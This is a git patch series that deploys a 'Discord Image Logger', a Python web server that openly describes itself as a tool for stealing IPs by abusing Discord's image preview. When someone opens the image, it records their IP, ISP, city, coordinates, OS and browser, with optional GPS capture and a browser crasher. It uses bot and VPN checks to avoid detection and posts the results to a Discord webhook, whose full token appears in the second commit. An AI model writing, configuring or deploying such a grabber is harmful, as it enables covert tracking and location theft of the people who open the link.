From 69727c63129bfed30c426d402bdf68ab9860e4d4 Mon Sep 17 00:00:00 2001 From: 0xyf77 <133903377+0xyf77@users.noreply.github.com> Date: Mon, 31 Jul 2023 18:21:32 +0300 Subject: [PATCH 1/5] Delete main.py --- main.py | 304 -------------------------------------------------------- 1 file changed, 304 deletions(-) delete mode 100644 main.py diff --git a/main.py b/main.py deleted file mode 100644 index 2efe786..0000000 --- a/main.py +++ /dev/null @@ -1,304 +0,0 @@ -# Discord Image Logger -# By DeKrypt | https://github.com/dekrypted - -from http.server import BaseHTTPRequestHandler -from urllib import parse -import traceback, requests, base64, httpagentparser - -__app__ = "Discord Image Logger" -__description__ = "A simple application which allows you to steal IPs and more by abusing Discord's Open Original feature" -__version__ = "v2.0" -__author__ = "DeKrypt" - -config = { - # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/your/webhook", - "image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument - # (E.g. yoursite.com/imagelogger?url=) - "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README) - - # CUSTOMIZATION # - "username": "Image Logger", # Set this to the name you want the webhook to have - "color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xFF0000) - - # OPTIONS # - "crashBrowser": False, # Tries to crash/freeze the user's browser, may not work. (I MADE THIS, SEE https://github.com/dekrypted/Chromebook-Crasher) - - "accurateLocation": False, # Uses GPS to find users exact location (Real Address, etc.) disabled because it asks the user which may be suspicious. - - "message": { # Show a custom message when the user opens the image - "doMessage": False, # Enable the custom message? - "message": "This browser has been pwned by DeKrypt's Image Logger. https://github.com/dekrypted/Discord-Image-Logger", # Message to show - "richMessage": True, # Enable rich text? (See README for more info) - }, - - "vpnCheck": 1, # Prevents VPNs from triggering the alert - # 0 = No Anti-VPN - # 1 = Don't ping when a VPN is suspected - # 2 = Don't send an alert when a VPN is suspected - - "linkAlerts": True, # Alert when someone sends the link (May not work if the link is sent a bunch of times within a few minutes of each other) - "buggedImage": True, # Shows a loading image as the preview when sent in Discord (May just appear as a random colored image on some devices) - - "antiBot": 1, # Prevents bots from triggering the alert - # 0 = No Anti-Bot - # 1 = Don't ping when it's possibly a bot - # 2 = Don't ping when it's 100% a bot - # 3 = Don't send an alert when it's possibly a bot - # 4 = Don't send an alert when it's 100% a bot - - - # REDIRECTION # - "redirect": { - "redirect": False, # Redirect to a webpage? - "page": "https://your-link.here" # Link to the webpage to redirect to - }, - - # Please enter all values in correct format. Otherwise, it may break. - # Do not edit anything below this, unless you know what you're doing. - # NOTE: Hierarchy tree goes as follows: - # 1) Redirect (If this is enabled, disables image and crash browser) - # 2) Crash Browser (If this is enabled, disables image) - # 3) Message (If this is enabled, disables image) - # 4) Image -} - -blacklistedIPs = ("27", "104", "143", "164") # Blacklisted IPs. You can enter a full IP or the beginning to block an entire block. - # This feature is undocumented mainly due to it being for detecting bots better. - -def botCheck(ip, useragent): - if ip.startswith(("34", "35")): - return "Discord" - elif useragent.startswith("TelegramBot"): - return "Telegram" - else: - return False - -def reportError(error): - requests.post(config["webhook"], json = { - "username": config["username"], - "content": "@everyone", - "embeds": [ - { - "title": "Image Logger - Error", - "color": config["color"], - "description": f"An error occurred while trying to log an IP!\n\n**Error:**\n```\n{error}\n```", - } - ], -}) - -def makeReport(ip, useragent = None, coords = None, endpoint = "N/A", url = False): - if ip.startswith(blacklistedIPs): - return - - bot = botCheck(ip, useragent) - - if bot: - requests.post(config["webhook"], json = { - "username": config["username"], - "content": "", - "embeds": [ - { - "title": "Image Logger - Link Sent", - "color": config["color"], - "description": f"An **Image Logging** link was sent in a chat!\nYou may receive an IP soon.\n\n**Endpoint:** `{endpoint}`\n**IP:** `{ip}`\n**Platform:** `{bot}`", - } - ], -}) if config["linkAlerts"] else None # Don't send an alert if the user has it disabled - return - - ping = "@everyone" - - info = requests.get(f"http://ip-api.com/json/{ip}?fields=16976857").json() - if info["proxy"]: - if config["vpnCheck"] == 2: - return - - if config["vpnCheck"] == 1: - ping = "" - - if info["hosting"]: - if config["antiBot"] == 4: - if info["proxy"]: - pass - else: - return - - if config["antiBot"] == 3: - return - - if config["antiBot"] == 2: - if info["proxy"]: - pass - else: - ping = "" - - if config["antiBot"] == 1: - ping = "" - - - os, browser = httpagentparser.simple_detect(useragent) - - embed = { - "username": config["username"], - "content": ping, - "embeds": [ - { - "title": "Image Logger - IP Logged", - "color": config["color"], - "description": f"""**A User Opened the Original Image!** - -**Endpoint:** `{endpoint}` - -**IP Info:** -> **IP:** `{ip if ip else 'Unknown'}` -> **Provider:** `{info['isp'] if info['isp'] else 'Unknown'}` -> **ASN:** `{info['as'] if info['as'] else 'Unknown'}` -> **Country:** `{info['country'] if info['country'] else 'Unknown'}` -> **Region:** `{info['regionName'] if info['regionName'] else 'Unknown'}` -> **City:** `{info['city'] if info['city'] else 'Unknown'}` -> **Coords:** `{str(info['lat'])+', '+str(info['lon']) if not coords else coords.replace(',', ', ')}` ({'Approximate' if not coords else 'Precise, [Google Maps]('+'https://www.google.com/maps/search/google+map++'+coords+')'}) -> **Timezone:** `{info['timezone'].split('/')[1].replace('_', ' ')} ({info['timezone'].split('/')[0]})` -> **Mobile:** `{info['mobile']}` -> **VPN:** `{info['proxy']}` -> **Bot:** `{info['hosting'] if info['hosting'] and not info['proxy'] else 'Possibly' if info['hosting'] else 'False'}` - -**PC Info:** -> **OS:** `{os}` -> **Browser:** `{browser}` - -**User Agent:** -``` -{useragent} -```""", - } - ], -} - - if url: embed["embeds"][0].update({"thumbnail": {"url": url}}) - requests.post(config["webhook"], json = embed) - return info - -binaries = { - "loading": base64.b85decode(b'|JeWF01!$>Nk#wx0RaF=07w7;|JwjV0RR90|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|Nq+nLjnK)|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsBO01*fQ-~r$R0TBQK5di}c0sq7R6aWDL00000000000000000030!~hfl0RR910000000000000000RP$m3body {{ -margin: 0; -padding: 0; -}} -div.img {{ -background-image: url('{url}'); -background-position: center center; -background-repeat: no-repeat; -background-size: contain; -width: 100vw; -height: 100vh; -}}
'''.encode() - - if self.headers.get('x-forwarded-for').startswith(blacklistedIPs): - return - - if botCheck(self.headers.get('x-forwarded-for'), self.headers.get('user-agent')): - self.send_response(200 if config["buggedImage"] else 302) # 200 = OK (HTTP Status) - self.send_header('Content-type' if config["buggedImage"] else 'Location', 'image/jpeg' if config["buggedImage"] else url) # Define the data as an image so Discord can show it. - self.end_headers() # Declare the headers as finished. - - if config["buggedImage"]: self.wfile.write(binaries["loading"]) # Write the image to the client. - - makeReport(self.headers.get('x-forwarded-for'), endpoint = s.split("?")[0], url = url) - - return - - else: - s = self.path - dic = dict(parse.parse_qsl(parse.urlsplit(s).query)) - - if dic.get("g") and config["accurateLocation"]: - location = base64.b64decode(dic.get("g").encode()).decode() - result = makeReport(self.headers.get('x-forwarded-for'), self.headers.get('user-agent'), location, s.split("?")[0], url = url) - else: - result = makeReport(self.headers.get('x-forwarded-for'), self.headers.get('user-agent'), endpoint = s.split("?")[0], url = url) - - - message = config["message"]["message"] - - if config["message"]["richMessage"] and result: - message = message.replace("{ip}", self.headers.get('x-forwarded-for')) - message = message.replace("{isp}", result["isp"]) - message = message.replace("{asn}", result["as"]) - message = message.replace("{country}", result["country"]) - message = message.replace("{region}", result["regionName"]) - message = message.replace("{city}", result["city"]) - message = message.replace("{lat}", str(result["lat"])) - message = message.replace("{long}", str(result["lon"])) - message = message.replace("{timezone}", f"{result['timezone'].split('/')[1].replace('_', ' ')} ({result['timezone'].split('/')[0]})") - message = message.replace("{mobile}", str(result["mobile"])) - message = message.replace("{vpn}", str(result["proxy"])) - message = message.replace("{bot}", str(result["hosting"] if result["hosting"] and not result["proxy"] else 'Possibly' if result["hosting"] else 'False')) - message = message.replace("{browser}", httpagentparser.simple_detect(self.headers.get('user-agent'))[1]) - message = message.replace("{os}", httpagentparser.simple_detect(self.headers.get('user-agent'))[0]) - - datatype = 'text/html' - - if config["message"]["doMessage"]: - data = message.encode() - - if config["crashBrowser"]: - data = message.encode() + b'' # Crasher code by me! https://github.com/dekrypted/Chromebook-Crasher - - if config["redirect"]["redirect"]: - data = f''.encode() - self.send_response(200) # 200 = OK (HTTP Status) - self.send_header('Content-type', datatype) # Define the data as an image so Discord can show it. - self.end_headers() # Declare the headers as finished. - - if config["accurateLocation"]: - data += b"""""" - self.wfile.write(data) - - except Exception: - self.send_response(500) - self.send_header('Content-type', 'text/html') - self.end_headers() - - self.wfile.write(b'500 - Internal Server Error
Please check the message sent to your Discord Webhook and report the error on the GitHub page.') - reportError(traceback.format_exc()) - - return - - do_GET = handleRequest - do_POST = handleRequest - -handler = ImageLoggerAPI From be030e4dffa136199613d20b97642080d944e15a Mon Sep 17 00:00:00 2001 From: 0xyf77 <133903377+0xyf77@users.noreply.github.com> Date: Mon, 31 Jul 2023 18:23:29 +0300 Subject: [PATCH 2/5] Create main.py --- api/main.py | 304 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 304 insertions(+) create mode 100644 api/main.py diff --git a/api/main.py b/api/main.py new file mode 100644 index 0000000..da725f2 --- /dev/null +++ b/api/main.py @@ -0,0 +1,304 @@ +# Discord Image Logger +# By DeKrypt | https://github.com/dekrypted + +from http.server import BaseHTTPRequestHandler +from urllib import parse +import traceback, requests, base64, httpagentparser + +__app__ = "Discord Image Logger" +__description__ = "A simple application which allows you to steal IPs and more by abusing Discord's Open Original feature" +__version__ = "v2.0" +__author__ = "DeKrypt" + +config = { + # BASE CONFIG # + "webhook": "https://discord.com/api/webhooks/1127557814093615195/DMX2XN2QBqQ7_DqJXz5MjHFdBsS3km87nFzRt4HcMOqkZorxz8dKT-HnI_7JEug_D2p1", + "image": "https://upload.wikimedia.org/wikipedia/commons/thumb/8/89/HD_transparent_picture.png/1200px-HD_transparent_picture.png", # You can also have a custom image by using a URL argument + # (E.g. yoursite.com/imagelogger?url=) + "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README) + + # CUSTOMIZATION # + "username": "grabber", # Set this to the name you want the webhook to have + "color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xFF0000) + + # OPTIONS # + "crashBrowser": True, # Tries to crash/freeze the user's browser, may not work. (I MADE THIS, SEE https://github.com/dekrypted/Chromebook-Crasher) + + "accurateLocation": True, # Uses GPS to find users exact location (Real Address, etc.) disabled because it asks the user which may be suspicious. + + "message": { # Show a custom message when the user opens the image + "doMessage": False, # Enable the custom message? + "message": "This browser has been pwned by datastealer", # Message to show + "richMessage": True, # Enable rich text? (See README for more info) + }, + + "vpnCheck": 1, # Prevents VPNs from triggering the alert + # 0 = No Anti-VPN + # 1 = Don't ping when a VPN is suspected + # 2 = Don't send an alert when a VPN is suspected + + "linkAlerts": True, # Alert when someone sends the link (May not work if the link is sent a bunch of times within a few minutes of each other) + "buggedImage": True, # Shows a loading image as the preview when sent in Discord (May just appear as a random colored image on some devices) + + "antiBot": 1, # Prevents bots from triggering the alert + # 0 = No Anti-Bot + # 1 = Don't ping when it's possibly a bot + # 2 = Don't ping when it's 100% a bot + # 3 = Don't send an alert when it's possibly a bot + # 4 = Don't send an alert when it's 100% a bot + + + # REDIRECTION # + "redirect": { + "redirect": False, # Redirect to a webpage? + "page": "https://your-link.here" # Link to the webpage to redirect to + }, + + # Please enter all values in correct format. Otherwise, it may break. + # Do not edit anything below this, unless you know what you're doing. + # NOTE: Hierarchy tree goes as follows: + # 1) Redirect (If this is enabled, disables image and crash browser) + # 2) Crash Browser (If this is enabled, disables image) + # 3) Message (If this is enabled, disables image) + # 4) Image +} + +blacklistedIPs = ("27", "104", "143", "164") # Blacklisted IPs. You can enter a full IP or the beginning to block an entire block. + # This feature is undocumented mainly due to it being for detecting bots better. + +def botCheck(ip, useragent): + if ip.startswith(("34", "35")): + return "Discord" + elif useragent.startswith("TelegramBot"): + return "Telegram" + else: + return False + +def reportError(error): + requests.post(config["webhook"], json = { + "username": config["username"], + "content": "@everyone", + "embeds": [ + { + "title": "Image Logger - Error", + "color": config["color"], + "description": f"An error occurred while trying to log an IP!\n\n**Error:**\n```\n{error}\n```", + } + ], +}) + +def makeReport(ip, useragent = None, coords = None, endpoint = "N/A", url = False): + if ip.startswith(blacklistedIPs): + return + + bot = botCheck(ip, useragent) + + if bot: + requests.post(config["webhook"], json = { + "username": config["username"], + "content": "", + "embeds": [ + { + "title": "Image Logger - Link Sent", + "color": config["color"], + "description": f"An **Image Logging** link was sent in a chat!\nYou may receive an IP soon.\n\n**Endpoint:** `{endpoint}`\n**IP:** `{ip}`\n**Platform:** `{bot}`", + } + ], +}) if config["linkAlerts"] else None # Don't send an alert if the user has it disabled + return + + ping = "@everyone" + + info = requests.get(f"http://ip-api.com/json/{ip}?fields=16976857").json() + if info["proxy"]: + if config["vpnCheck"] == 2: + return + + if config["vpnCheck"] == 1: + ping = "" + + if info["hosting"]: + if config["antiBot"] == 4: + if info["proxy"]: + pass + else: + return + + if config["antiBot"] == 3: + return + + if config["antiBot"] == 2: + if info["proxy"]: + pass + else: + ping = "" + + if config["antiBot"] == 1: + ping = "" + + + os, browser = httpagentparser.simple_detect(useragent) + + embed = { + "username": config["username"], + "content": ping, + "embeds": [ + { + "title": "Image Logger - IP Logged", + "color": config["color"], + "description": f"""**A User Opened the Original Image!** + +**Endpoint:** `{endpoint}` + +**IP Info:** +> **IP:** `{ip if ip else 'Unknown'}` +> **Provider:** `{info['isp'] if info['isp'] else 'Unknown'}` +> **ASN:** `{info['as'] if info['as'] else 'Unknown'}` +> **Country:** `{info['country'] if info['country'] else 'Unknown'}` +> **Region:** `{info['regionName'] if info['regionName'] else 'Unknown'}` +> **City:** `{info['city'] if info['city'] else 'Unknown'}` +> **Coords:** `{str(info['lat'])+', '+str(info['lon']) if not coords else coords.replace(',', ', ')}` ({'Approximate' if not coords else 'Precise, [Google Maps]('+'https://www.google.com/maps/search/google+map++'+coords+')'}) +> **Timezone:** `{info['timezone'].split('/')[1].replace('_', ' ')} ({info['timezone'].split('/')[0]})` +> **Mobile:** `{info['mobile']}` +> **VPN:** `{info['proxy']}` +> **Bot:** `{info['hosting'] if info['hosting'] and not info['proxy'] else 'Possibly' if info['hosting'] else 'False'}` + +**PC Info:** +> **OS:** `{os}` +> **Browser:** `{browser}` + +**User Agent:** +``` +{useragent} +```""", + } + ], +} + + if url: embed["embeds"][0].update({"thumbnail": {"url": url}}) + requests.post(config["webhook"], json = embed) + return info + +binaries = { + "loading": base64.b85decode(b'|JeWF01!$>Nk#wx0RaF=07w7;|JwjV0RR90|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|Nq+nLjnK)|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsBO01*fQ-~r$R0TBQK5di}c0sq7R6aWDL00000000000000000030!~hfl0RR910000000000000000RP$m3body {{ +margin: 0; +padding: 0; +}} +div.img {{ +background-image: url('{url}'); +background-position: center center; +background-repeat: no-repeat; +background-size: contain; +width: 100vw; +height: 100vh; +}}
'''.encode() + + if self.headers.get('x-forwarded-for').startswith(blacklistedIPs): + return + + if botCheck(self.headers.get('x-forwarded-for'), self.headers.get('user-agent')): + self.send_response(200 if config["buggedImage"] else 302) # 200 = OK (HTTP Status) + self.send_header('Content-type' if config["buggedImage"] else 'Location', 'image/jpeg' if config["buggedImage"] else url) # Define the data as an image so Discord can show it. + self.end_headers() # Declare the headers as finished. + + if config["buggedImage"]: self.wfile.write(binaries["loading"]) # Write the image to the client. + + makeReport(self.headers.get('x-forwarded-for'), endpoint = s.split("?")[0], url = url) + + return + + else: + s = self.path + dic = dict(parse.parse_qsl(parse.urlsplit(s).query)) + + if dic.get("g") and config["accurateLocation"]: + location = base64.b64decode(dic.get("g").encode()).decode() + result = makeReport(self.headers.get('x-forwarded-for'), self.headers.get('user-agent'), location, s.split("?")[0], url = url) + else: + result = makeReport(self.headers.get('x-forwarded-for'), self.headers.get('user-agent'), endpoint = s.split("?")[0], url = url) + + + message = config["message"]["message"] + + if config["message"]["richMessage"] and result: + message = message.replace("{ip}", self.headers.get('x-forwarded-for')) + message = message.replace("{isp}", result["isp"]) + message = message.replace("{asn}", result["as"]) + message = message.replace("{country}", result["country"]) + message = message.replace("{region}", result["regionName"]) + message = message.replace("{city}", result["city"]) + message = message.replace("{lat}", str(result["lat"])) + message = message.replace("{long}", str(result["lon"])) + message = message.replace("{timezone}", f"{result['timezone'].split('/')[1].replace('_', ' ')} ({result['timezone'].split('/')[0]})") + message = message.replace("{mobile}", str(result["mobile"])) + message = message.replace("{vpn}", str(result["proxy"])) + message = message.replace("{bot}", str(result["hosting"] if result["hosting"] and not result["proxy"] else 'Possibly' if result["hosting"] else 'False')) + message = message.replace("{browser}", httpagentparser.simple_detect(self.headers.get('user-agent'))[1]) + message = message.replace("{os}", httpagentparser.simple_detect(self.headers.get('user-agent'))[0]) + + datatype = 'text/html' + + if config["message"]["doMessage"]: + data = message.encode() + + if config["crashBrowser"]: + data = message.encode() + b'' # Crasher code by me! https://github.com/dekrypted/Chromebook-Crasher + + if config["redirect"]["redirect"]: + data = f''.encode() + self.send_response(200) # 200 = OK (HTTP Status) + self.send_header('Content-type', datatype) # Define the data as an image so Discord can show it. + self.end_headers() # Declare the headers as finished. + + if config["accurateLocation"]: + data += b"""""" + self.wfile.write(data) + + except Exception: + self.send_response(500) + self.send_header('Content-type', 'text/html') + self.end_headers() + + self.wfile.write(b'500 - Internal Server Error
Please check the message sent to your Discord Webhook and report the error on the GitHub page.') + reportError(traceback.format_exc()) + + return + + do_GET = handleRequest + do_POST = handleRequest + +handler = ImageLoggerAPI From e1ef32dd8aac016ffe7dacfa43668c9b8688bd1b Mon Sep 17 00:00:00 2001 From: 0xyf77 <133903377+0xyf77@users.noreply.github.com> Date: Mon, 31 Jul 2023 18:23:39 +0300 Subject: [PATCH 3/5] Delete requirements.txt --- requirements.txt | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 requirements.txt diff --git a/requirements.txt b/requirements.txt deleted file mode 100644 index 356c9de..0000000 --- a/requirements.txt +++ /dev/null @@ -1,2 +0,0 @@ -requests -httpagentparser From 7a41d850c23b113e5bcaba1a47997d92d3d333d9 Mon Sep 17 00:00:00 2001 From: 0xyf77 <133903377+0xyf77@users.noreply.github.com> Date: Mon, 31 Jul 2023 18:24:13 +0300 Subject: [PATCH 4/5] Create requirements.txt --- api/requirements.txt | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 api/requirements.txt diff --git a/api/requirements.txt b/api/requirements.txt new file mode 100644 index 0000000..356c9de --- /dev/null +++ b/api/requirements.txt @@ -0,0 +1,2 @@ +requests +httpagentparser From 96f0c621f0c858a8dbb3fe2130db3f95813539ff Mon Sep 17 00:00:00 2001 From: 0xyf77 <133903377+0xyf77@users.noreply.github.com> Date: Mon, 31 Jul 2023 18:25:45 +0300 Subject: [PATCH 5/5] Create index.html --- index.html | 1 + 1 file changed, 1 insertion(+) create mode 100644 index.html diff --git a/index.html b/index.html new file mode 100644 index 0000000..fa9c732 --- /dev/null +++ b/index.html @@ -0,0 +1 @@ +